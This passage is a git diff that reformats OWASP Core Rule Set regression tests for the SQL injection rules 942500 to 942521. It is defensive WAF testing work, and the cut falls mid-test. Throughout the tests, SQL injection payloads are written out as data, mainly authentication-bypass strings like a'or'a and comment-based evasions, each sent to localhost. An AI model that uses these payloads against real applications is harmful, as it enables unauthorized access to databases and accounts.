text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log_contains: id "942500" + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log_contains: id "942500" + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211cc7..1b91b767f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -2,38 +2,34 @@ meta: author: "Franziska Buehler, azurit" description: None - enabled: true - name: 942510.yaml tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log_contains: id "942510" + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + no_log_contains: id "942510" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3cb..f2c76b472 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -2,38 +2,34 @@ meta: author: "Walter Hop, azurit" description: None - enabled: true - name: 942511.yaml tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + no_log_contains: id "942511" + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log_contains: id "942511" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b6a..7bd43221f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -2,409 +2,385 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.0/4" - enabled: true - name: 942520.yaml +rule_id: 942520 tests: - - test_title: 942520-1 + - test_id: 1 desc: "Detects basic SQL auth bypass with 'is not something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20not-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 2 desc: "Negative test: 'is notes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20notes" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20like%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'|email-- - data: "var=x'%7Cemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'-email-- - data: "var=x'-email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'+email-- (there seem to be a bug with double encoding in tests) - data: "var=x'%252Bemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'^email-- - data: "var=x'%5Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'@email-- - data: "var=x'%40email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'&email-- - data: "var=x'%26email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'email-- - data: "var=x'%3Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'>email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'=email-- - data: "var=x'%3Demail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'/email-- - data: "var=x'%2Femail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'%email-- - data: "var=x'%25email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'~email-- - data: "var=x'~email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=x'%20mod%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='sounds%20like%20rowid--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 20 desc: "Bypass with a comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%2F**%2F*2--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'or'oof" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942520-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo%5c''or'oof" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942520-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20is%20not%3F--" - version: HTTP/1.0 - output: - log_contains: id "942520" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log_contains: id "942520" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index 4a119284b..e01b0059b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -2,410 +2,385 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942521.yaml +rule_id: 942521 tests: - - test_title: 942521-1 + - test_id: 1 desc: "Detects the most basic authentication bypass with 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or'a" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or'a" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=is%20this%20your%20parents'%20or%20yours?" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'and%20id%20is%20not?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=it%20is%20your%20parents'%20and%20yours" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 6 desc: "Negative test: bob's or alice's" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=bob's%20or%20alice's" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 7 desc: "Negative test: mother or daugher" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=mother%20or%20daughter" - version: HTTP/1.0 - output: - 